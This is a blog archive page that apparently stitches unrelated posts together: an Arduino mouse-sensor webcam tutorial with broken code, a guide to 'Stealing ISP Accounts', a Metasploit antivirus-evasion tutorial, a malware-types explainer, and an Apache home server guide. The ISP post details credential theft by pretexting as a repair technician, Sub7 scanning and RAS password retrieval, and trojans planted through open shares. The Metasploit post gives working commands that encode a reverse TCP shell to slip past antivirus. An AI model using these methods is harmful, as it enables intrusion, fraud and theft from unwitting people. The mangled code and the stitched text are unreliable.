Monday, 20 January 2014

Convert Optical Mouse into Arduino Web Camera

Optical mouse uses a small camera that records surface to calculate movements of the mouse.
In this tutorial I will show you how to display video signal of this camera in your browser.
The mouse I took apart was an old Logitech RX 250 which contains ADNS-5020 optical sensor.
This sensor records 15x15 pixel images in grayscale. It also calculates X-Y movements of the mouse.
Arduino Web Camera
To get the things running you will need:
- arduino
- ethernet shield
- optical mouse with ADNS-5020 sensor
- 10K ohm resistor

Connect everything together

Make sure that pins (NRESET, NCS, DSIO, SCLK) of the sensor don't connect to anything on the mouse board.
If they do, cut the traces. (I removed the main chip and some resistors to achieve the same thing.)
ADNS-5020 mouse sensor
Solder 10K ohm resistor between NRESET and +5V. Then solder wires (approx. 20cm) to pins NCS, DSIO, SCLK, +5V, GND.
This is a scheme that you should end with:
Arduino ADNS5020 scheme
Put Ethernet shield on arduino and connect it to local network.
Then connect mouse sensor to arduino like this:
+5V -------------- Arduino +5V
GND -------------- Arduino GND
NCS -------------- Arduino digital pin 7
SDIO -------------- Arduino digital pin 6
SCLK -------------- Arduino digital pin 5

Arduino sketch

In the sketch below replace receiverIP value (in my case 192, 168, 1, 102) to IP of your computer.
Then upload the sketch to arduino.
#include <SPI.h>
#include <Ethernet.h>
#include <EthernetUdp.h>

byte arduinoMac[] = { 0xDE, 0xAD, 0xBE, 0xEF, 0xFE, 0xED };
IPAddress arduinoIP(192, 168, 1, 177); // desired IP for Arduino
unsigned int arduinoPort = 8888; // port of Arduino

IPAddress receiverIP(192, 168, 1, 102); // IP of udp packets receiver
unsigned int receiverPort = 6000; // port to listen on my PC

EthernetUDP Udp;

int SCLK = 5;
int SDIO = 6;
int NCS = 7;

void setup() {

pinMode(SCLK, OUTPUT);
pinMode(SDIO, OUTPUT);
pinMode(NCS, OUTPUT);


void loop() {
char img[225];
for (int i=0;i<225;i++){
img[i] &= 0x7F;
img[i]+=1;//if there is 0 value, part of udp package is lost
Serial.print(img[i], DEC);
Udp.beginPacket(receiverIP, receiverPort); //start udp packet
Udp.write(img); //write mouse data to udp packet
Udp.endPacket(); // end packet


void mouse_reset(){
// Initiate chip reset
digitalWrite(NCS, LOW);
digitalWrite(NCS, HIGH);
// Set 1000cpi resolution
digitalWrite(NCS, LOW);
digitalWrite(NCS, HIGH);

unsigned int readLoc(uint8_t addr){
unsigned int ret=0;
digitalWrite(NCS, LOW);
digitalWrite(NCS, HIGH);

void pushbyte(uint8_t c){
pinMode(SDIO, OUTPUT);
for(unsigned int i=0x80;i;i=i>>1){
digitalWrite(SCLK, LOW);
digitalWrite(SDIO, c & i);
digitalWrite(SCLK, HIGH);

unsigned int pullbyte(){
unsigned int ret=0;
pinMode(SDIO, INPUT);
for(unsigned int i=0x80; i>0; i>>=1) {
digitalWrite(SCLK, LOW);
ret |= i*digitalRead(SDIO);
digitalWrite(SCLK, HIGH);
pinMode(SDIO, OUTPUT);

Open serial window and you should see data flow from mouse:
Serial window

Install Node.js and Socket.IO

To display data in browser we need to have node.js and installed on computer.
Install node.js from here: then go to windows command prompt and run: 
npm install

Node.js and and website code

In the code below we configure node.js to listen to udp traffic from arduino, send all data to browser with and setup a basic web server.
var dgram = require("dgram");
var server = dgram.createSocket("udp4");

var io = require('').listen(8000); // server listens for communication at port 8000
io.set('log level', 1); // disables debugging. this is optional. you may remove it if desired.

server.on("message", function (msg, rinfo) { //every time new data arrives do this:
//console.log("server got: " + msg + " from " + rinfo.address + ":" + rinfo.port);
//console.log("server got:" + msg);
io.sockets.emit('message', msg);

server.on("listening", function () {
var address = server.address();
console.log("server listening " + address.address + ":" + address.port);

server.bind(6000); //listen to udp traffic on port 6000

var http = require("http"),
url = require("url"),
path = require("path"),
fs = require("fs")
port = process.argv[2] || 8888;

http.createServer(function(request, response) {

var uri = url.parse(request.url).pathname
, filename = path.join(process.cwd(), uri);

var contentTypesByExtension = {
'.html': "text/html",
'.css': "text/css",
'.js': "text/javascript"

fs.exists(filename, function(exists) {

if(!exists) {
response.writeHead(404, {"Content-Type": "text/plain"});
response.write("404 Not Found\n");

if (fs.statSync(filename).isDirectory()) filename += '/index.html';

fs.readFile(filename, "binary", function(err, file) {
var headers = {};
var contentType = contentTypesByExtension[path.extname(filename)];
if (contentType) headers["Content-Type"] = contentType;
response.writeHead(200, headers);
response.write(file, "binary");
}).listen(parseInt(port, 10));

console.log("Static file server running at\n => http://localhost:" + port + "/\nCTRL + C to shutdown");
Just save the code as: code.js
Now we need to create a website which will convert data from into 15x15 image.
This is it:
#wrapper { width:300px; height:300px; }
div div { width:20px; height:20px; float:left; }
<script type="text/javascript" src="//localhost:8000/"></script>
var socket = io.connect('http://localhost:8000');
socket.on('connect', function () {
socket.on('message', function (msg) {
document.getElementById('wrapper').innerHTML = '';
for (var i = 0; i < 225; i++) {
function pixDraw(clr) {
var pixDiv = document.createElement('div'); = "rgb("+clr+","+clr+","+clr+")";
<div id="wrapper"></div>
Save it as index.html

Run it!

If you are on windows then just download zip file below and run the runme.bat file.
If you are on linux then run the command node code.js in the shell.
Now open the address http://localhost:8888/ in a web browser and you should see a realtime image from mouse:
video in browser


Download files

All files are in this zip:

Friday, 17 January 2014

Stealing ISP Accounts !!!!!

Disclaimer :- Any Misuse Of This tutorial can lead you to jail.Try It At Your Own Risk. Underground Hackers World Will Not be Responsible for any misuse of this Tutorial.

This Tutorial is For Educational Purpose Only

Why would you want a stolen ISP account u ask?? well there are two reasons, you are too poor to afford the local phone companies bull shit prices or you need an easier and faster platform to hack from than five proxies and three wingates, well here is your answer. Remember there is no point in going out and hacking your local ISP to get an account, the easier the better is my suggestion.

Now firstly you may be reading this at school or from somewhere and you dont have access at home so now i will show you some of the method's i have used to gain accounts. This Tutorial Is Posted By Underground Hackers and if you found this tutorial without this messages let us know the copycats in inbox or mail us at of the most simple method's is to go to a local shop and find a computer on dialup access, then simply run a password snatcher on it such as WASP and then emailing all the information outside where you can process it, this method is relatively simple and if you get caught they just chuck you out of the store. These accounts are normally only good for night access, we want 24/7 access. One method i have found works is ringing up the local ISP and asking to purchase an account, say you are in a rush but make sure you dont sound fake, they normally say "here is your internet username and password, we will send out the information for you to send back blah blah blah..." now of course you have to make sure you call without Caller ID active, if you live in Australia just prefix your number with 1831. This method can be rather annoying and normally doesn't work, but it is worth a try and the account normally last's for a few weeks. My favorite method is one of great effort but also great reward, find a local computer store that is overpriced and offers all that extended warranty crap, now get yourself a shit and screen print their logo on it, now get a list of people who purchase computers from there, or just follow people home. Now that we have five or six people who are stupid enough to pay 600% of the price for a computer than they should, go around there houses and pose as a computer repair guy sent out from the store, say something like, this is part of the extended life warranty you purchased with your computer, we are just performing a regular checkup as we have had a few problems with your model of computer. nine times out of ten they will let you straight through the door without even asking any questions to do with abacus, just the mere thought of their overpriced piece of crap not working makes them do whatever you want, now when you are in just run a program through there computer and snatch there internet accounts, it doesnt matter who they are for, just the we will get more later with these ones. Make sure you stay for an hour or so and run scandisk and defrag to make it look real. Now unless you are really stupid you should have around five or six internet accounts.

Now when you dial up to them make sure you turn of Caller ID, this is what stop's you from being pinned straight away, check the person's email and remove any multiple logging reports and make sure you change internet accounts ATLEAST once a week and never use the old one again, give it to some lamer over the net and let them get in trouble for your hack's. You should be on the net by now, but to change accounts once a week we really need more accounts, i hate to say it but the easiest way to get more accounts in by using winblows, so fire up winblows and ignore all the illegal operation crap and download the following program's:

Legion - Open Share Scanner

Sub 7 Defcon edition

Sub 7 2.2


Now open up mIRC and go to a local area's channel, /whois a few people until you find the isp you like.

Infinity is * BoMFunk Mc'S

So we have made our choice, reveal ATT&T, now do a /dns on as this is his host.

*** Resolved to

Now convert this into a class B network and we have, this is our target, open up Sub 7 2.2 and goto Connection > Scanner > Local Scanner. Put the Start ip as and the end ip as, then click scan. This will take quite a while, now when you get a result open up Sub 7 Defcon and put it in the field up the top and click connect. If you get asked for a password then dont bother with this IP, but if it comes up with connected at the bottom we are in business. First thing you should do is goto Advanced > Passwords > Retrieve RAS Passwords, this is there internet username and password aswell as phone number, make sure you get you local phone number from the ISP's site. Next goto Connection > Server Options and set a password, we don't want other people getting on the net while we are hacking and kicking us off. Turn on IP Notify as well so that you can get this server to do remote scan's for you if needed, ISP's sometimes check for people who scan and bust their ass.

To anyone who says using Sub 7 is a lame way to get accounts, i agree but i would rather this way than hacking my local ISP and getting put in jail before i even get to my target. You ask why you use Sub 7 2.2 just for scanning?? well its a better scanner than Defcon, but it doesn't allow IRC bots or IP Notify.

The Next way to gain accounts is to find open shares and upload a trojan. To do this open up legion scanner and do a scan of the same range as you did with sub 7, expect do it in small ammounts like -,when it comes up with a result go into my computer and change the address to \\ and then the ip, so for example \\ then wait for it to load, you might get asked for a password, if so ignore this ip and continue scanning, if you dont get a password, have a look at the names, look for the C drive if it is there and go into it, then go into windows > start menu > programs > startup, and paste a trojan server in here, make sure it doesnt come up with a prompt and that it will notify you when they get on the net next. All you have to do now is wait, within a few day's you should be able to get atleast 20-30 accounts, if not around 50. This should last for a long time and you can do anything you want with them. Just remember to disable Caller ID and to change accounts every week atleast.

DO NOT fuck with the person you get the account from, keep your stealth and don't advertise the fact you don't pay for internet, or the fact you hack from other peoples accounts.

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How to Change the Signature of Metasploit Payloads to Evade Antivirus Detection


In this tutorial, we will take a more in-depth look at this command and
its capabilities for re-coding our payloads. A quick note before we get
Find out what AV software the target system is using and re-encode to
evade that AV package. No re-encoding scheme will work with all AV
software, so don't waste time developing a new encoding scheme that
works with your AV software, but may not evade the target system's
AV software.
So, let's open up BackTrack and fire up Metasploit!!!

Let's begin by simply typing msfencode at our prompt with the -h
switch for help.
msfencode -h
As you will see, all the key switches that we can use with
this command. Note the -e switch. This designates the encoder we
want to use to re-encode our payload.
Also, note the section with the -t switch. This
switch determines what the output format is. You can see there are
numerous formats including raw, ruby, perl, java, exe, vba, vbs, etc.
Each of these outputs gives us an opportunity to change the signature
and attempt to evade the AV software.

Next, let's look at what encoders are available in msfencode.
msfencode -l
As the next screen shows, msfencode includes numerous different
encoding schemes. Fourth from the bottom we see "shikata_ga_nai."
Note that it is rated "excellent" and it's a "Polymorphic XOR Additive
Feedback Encoder." Let's take a look at that one.

First, this strange sounding shikata_ga_nai encoder is a Japanese
phrase that loosely translates to "nothing can be done about it." An
excellent name for an encoder with bad intentions!
Second, it's an additive XOR polymorphic encoder. Without going into
too much detail, this means that it will change its shape/signature
(polymorphic), by using an XOR encrypting scheme. XOR is far from a
perfect encryption scheme, but it's efficient and can generate multiple
shapes/signatures quickly that can then be decrypted by the code
itself once it arrives at the target.

Now, let's use shikata_ga_nai to re-encode our reverse TCP shell to
get it past AV software. At the command prompt in BackTrack, type:
msfpayload windows/shell/reverse_tcp LHOST R |msfencode -e x86/shikata_ga_nai -c
20 -t vbs > /root/AVbypass.vbs

Let's take this command apart and see what it does.
msfpayload windows/shell/reverse_tcp LHOST R
The above part creates a payload with the reverse TCP shell for a local
host at
The "|"
This symbol means pipe that payload to the following command.
msfencode -e x86/shikata_ga_nai -c 20 -t vbs
Means re-encode that payload with skikata_ga_nai and run it 20 times
(-c 20), and then encode it to look like a .vbs script.
> /root/AVbypass.vbs
Means send the newly encoded payload to a file in the /root directory
and name it AVbypass.vbs so that it appears to be a .vbs script.

When we run this command, we get the following output showing us
that shikata_ga_nai is running our payload through 20 iterations (-c
Now let's go to the directory we told shikata_ga_nai to send our newly
encoded payload to and check to see whether it is there.
cd /root
ls -l
As you will see, we now have a file in our root directory called
AVbypass.vbs that we can now test against the target's AV software to
see whether it detects it. This method works in most cases, but if it
doesn't, simply send the payload through various number of iterations
until you find an encoding that the AV software does not detect.

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What is Malicious Softwares? What are the type of Malicious Softwares.

What is Malware? :

Malware is a malicious software. This software include the program
that exploit the vulnerabilities in computing system. The purpose of
malicious software is harm you or steal the information from you.

Types of Malicious Softwares:

There are three characteristics of malwares:
1 Self-replicating malware actively attempts to propagate by creating
copies, or instances, of itself. Malware may also be propagated
by a user copying it accidentally, for example, but this isn't self-
2 The population growth of malware describes the overall change in
the number
of malware instances due to self-replication. Malware that doesn't
will always have a zero population growth, but malware with a
zero population growth may self-replicate.
3 Parasitic malware requires some other executable code in order to
"Executable" in this context should be taken very broadly to include
that can be executed, such as boot block code on a disk, binary code

Trojan Horse :

Self-replicating: no
Population growth: zero
Parasitic: yes
The most famous malicious software is Trojan
There was no love lost between the Greeks and the Trojans. The
Greeks had
besieged the Trojans, holed up in the city of Troy, for ten years. They
took the city by using a clever ploy: the Greeks built an enormous
wooden horse,
concealing soldiers inside, and tricked the Trojans into bringing the
horse into
Troy. When night fell, the soldiers exited the horse and much
In computing, a Trojan horse is a program which purports to do some
task, but secretly performs some additional malicious task. A classic
example is
a password-grabbing login program which prints authentic-looking
and "password" prompts, and waits for a user to type in the
information. When
this happens, the password grabber stashes the information away for
its creator,
then prints out an "invalid password" message before running the real
program. The unsuspecting user thinks they made a typing mistake
and reenters
the information, none the wiser.

Logic Bomb:

Self-replicating: no
Population growth: zero
Parasitic: possibly
The oldest type of malicious software. This
program is embedded with some other program. When certain
condition meets, the logic bomb will destroy your pc.
It also crash at particular date which is fixed by attacer. It will be
included in legitimate or authorized person like this:
legitimate code
if date is Friday the 13th:
legitimate code
if some antivirus trying to delete or clean the logic bomb. The logic
bomb will destroy the pc.

Back Door or Trap Door :

Self-replicating: no
Population growth: zero
Parasitic: possibly
A back door is any mechanism which bypasses
a normal security check. Programmers
sometimes create back doors for legitimate reasons, such as skipping
a time-consuming authentication process when debugging a network
As with logic bombs, back doors can be placed into legitimate code or
standalone programs.
username = read_username()
password = read_password()
if tisername i s "133t h4ck0r":
if username and password are valid:
e l s e:
One special kind of back door is a RAT, which stands for Remote
Tool or Remote Access Trojan, depending on who's asked. These
allow a computer to be monitored and controlled remotely;


Self-replicating: yes
Population growth: positive
Parasitic: yes
A virus is malware that, when executed, tries to replicate itself into
other executable
code; when it succeeds, the code is said to be infected. The infected
code, when run, can infect new code in turn. This self-replication into
executable code is the key defining characteristic of a virus.
Types of Virus
1.Parasitic virus:
Traditional and common virus. This will be attached with EXE files
and search for other EXE file to infect them.
2. Memory Resident Virus:
Present in your system memory as a system program. From here
onwards it will infects all program that executes.
3. Boot Sector Virus:
Infects the boot record and spread when the system is booted from
the disk containing the virus.
4. Stealth Virus:
This virus hides itself from detection of antivirus scanning.


Self-replicating: yes
Population growth: positive
Parasitic: no
A worm shares several characteristics with a
virus. The most important characteristic
is that worms are self-replicating too, but self-replication of a worm
is distinct in two ways. First, worms are standalone, and do not rely
on other
executable code. Second, worms spread from machine to machine
across networks.


Self-replicating: yes
Population growth: zero
Parasitic: no
Rabbit is the term used to describe malware that multiplies rapidly.
may also be called bacteria, for largely the same reason.
There are actually two kinds of rabbit.The first is a program which tries
to consume all of some system resource, like disk space. A "fork
bomb," a
program which creates new processes in an infinite loop, is a classic
of this kind of rabbit. These tend to leave painfully obvious trails
pointing to
the perpetrator, and are not of particular interest.
The second kind of rabbit, which the characteristics above describe, is
special case of a worm. This kind of rabbit is a standalone program
replicates itself across a network from machine to machine, but deletes
original copy of itself after replication. In other words, there is only
one copy
of a given rabbit on a network; it just hops from one computer to
Rabbits are rarely seen in practice.


Spyware is software which collects information
from a computer and transmits
it to someone else.
The exact information spyware gathers may
vary, but can include anything
which potentially has value:
1 Usernames and passwords. These might be harvested from files on
machine, or by recording what the user types using a key logger. A
differs from a Trojan horse in that a keylogger passively captures
only; no active deception is involved.
2 Email addresses, which would have value to a spammer.
3 Bank account and credit card numbers.
4 Software license keys, to facilitate software pirating.


Self-replicating: no
Population growth: zero
Parasitic: no
Adware has similarities to spyware in that both
are gathering information about
the user and their habits. Adware is more
marketing-focused, and may pop up
advertisements or redirect a user's web browser to certain web sites in
the hopes
of making a sale. Some adware will attempt to target the advertisement
to fit
the context of what the user is doing. For example, a search for
"Calgary" may
result in an unsolicited pop-up advertisement for "books about
Adware may also gather and transmit information about users which
can be
used for marketing purposes. As with spyware, adware does not self-


Computers that have been compromised can be used by an attacker for
variety of tasks, unbeknownst to the legitimate owner; computers used
in this
way are called zombies. The most common tasks for zombies are
sending spam
and participating in coordinated, large-scale denial-of-service attacks.

Signs that your system is Infected by Malware:

Slow down, malfunction, or display repeated error messages
Won't shut down or restart
Serve up a lot of pop-up ads, or display them when you're not
surfing the web
Display web pages or programs you didn't intend to use, or send
emails you didn't write.

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How to create your own HTTP server

After reading this you can create your own http server in your
system. A web server is software installed on a computer that allows
other computers to access specific files on that computer/server. There
are many reasons to create your own home servers.

For example: file
sharing, so you can download files from your home computer from
anywhere or you can create a web site on own server etc. Simply said
It works like this; You choose a directory on your computer , in that
directory add folders, files like music,video and etc. When you put the
IP address of your computer the in web browser you can see all the
files from that folder and you can download those files. Let’s now
create a server(HTTP server!) using Apache(a server client):


Broadband internet connection always on
Windows on your computer
Installing Apache Http Server and Configuring :
Download the apache_2.2.10-win32-x86-no_ssl.msi

Start to install by following the steps:

1.Set parameters( for localhost type something like a
(doesn’t really matter), also type your email address in field
“Administrator@ Email Address” ) choose where you
want to install it.
2.When you install Apache , go to directory where you installed it (p.e.
“C:\Program Files\Apache Software Foundation\Apache2.2\conf”) ,
here you will find a httpd file.
Open that file with notepad.
After this will appear notepad with long and complicated code, don´t
worry, you must change just 3 things.
3.In notepad file find #DocumentRoot “C:/Program Files/Apache
Group/Apache2/htdocs” and replace with #DocumentRoot “E:\my
server”. Also find #<Directory “C:/Program Files/Apache Group/
Apache2/htdocs” and replace with <Directory “E:\my server”. E:\my
server is folder where you put files which will appear on your server. In
this example I created that folder on local disc E:. You can create your
folder in any other place, but then type that path here. Find
#AllowOverride None and change to AllowOverride All .
After this, save file like httpd.conf.
4.Create Folder in E drive as "myserver"
5. Type in web addresses http://localhost/ or your IP Address
6. If you want access own server from other computers. You must
forward a port in the router we’re using. The port we need to forward
is port number 80. Why? Because by default it’s the port used for
HTTP. Port forwarding actually means opening a tunnel through the
router so that the router wouldn’t reject the connections that are
trying to connect to it. How to port-forward? With every router it’s
different. You must
also turn off you firewall.

Note: Creating home server is risky,when you open port, there is a
possibility to have someone a breach in your computer .Before you
start, make sure your computer has all the latest patches and
security updates, and that you’ve done a thorough spyware and
virus scan. This tutorial is only for advanced users...

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